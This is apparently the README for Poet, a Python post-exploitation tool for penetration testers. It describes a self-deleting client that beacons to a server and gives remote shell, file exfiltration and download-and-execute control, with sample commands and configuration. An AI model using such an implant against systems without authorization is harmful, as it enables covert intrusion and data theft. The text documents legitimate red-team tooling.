poet: Post-exploitation tool for Pentester

poet

A simple POst-Exploitation Tool.

overview

The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn’t running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running, however, the attacker gets a control shell to control the client and perform various actions on the target including:

• reconnaissance
• remote shell
• file exfiltration
• download and execute
• self destruct

Download

Usage

Poet is super easy to use and requires nothing more than the Python (2.7) standard library. To easily test it out, a typical invocation would look like:

Terminal 1:

$ ./poet-client 127.0.0.1 1 –debug –no-selfdestruct

By default, the Poet client daemonizes and deletes itself from disk, so that behavior is suppressed using the –debug and –no-selfdestruct flags.

Terminal 2:

$ sudo ./poet-server

By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).

Configuration

The common/config.py file contains various optional configuration settings for Poet builds.

• AUTH: Secret authentication token shared between the client and server for client authentication. Note that the default one is anything but secret. For any non-testing usage, it is recommended to change it to another unguessable value. Note that pre-built packages use the default, public authentication token.
• ARCHIVE_DIR: Directory used by the server to store files (exec output, exfil, recon, etc).
• SERVER_IP: IP address of the server.
• BEACON_INTERVAL: Seconds between client beacons to the server.

The SERVER_IP and BEACON_INTERVAL configurations allow information previously required in command line arguments to be baked into the final executables such that the final executable can simply be executed with no arguments. Values of None for either of them cause them to revert to default behavior (required command line arg for SERVER_IP, optional command line argument for BEACON_INTERVAL).

client

$ ./poet-client -h

usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct]

                   IP [INTERVAL]



positional arguments:

  IP                    Poet Server

  INTERVAL              Beacon Interval, in seconds. Default: 600



optional arguments:

  -h, --help            show this help message and exit

  -p PORT, --port PORT

  --debug               show debug messages. implies --no-daemon

  --no-daemon           don't daemonize

  --no-selfdestruct     don't selfdestruct

Poet is a client/server application. The client is executed on the target and beacons back to the server at a certain time interval. The only required argument is the IP address where the server is or will be running. Following it can optionally be the time interval in seconds of how frequently to beacon back, which defaults to 10 minutes. The port for the client to beacon out on can be specified with the -p flag. All other flags would not be used during “real” usage and exist mainly for debugging.

server

$ ./poet-server -h

usage: poet-server [-h] [-p PORT] [-v]



optional arguments:

  -h, --help            show this help message and exit

  -p PORT, --port PORT

  -v, --version         prints the Poet version number and exits

The server is executed on the user’s own machine and listens for beacons from the client. By default, it listens on a privileged port (443) and must be run with privileges (which are quickly dropped after binding). The -p flag can be used to bypass this by selecting an unprivileged port to listen on (>1024).

Source: https://github.com/mossberg/poet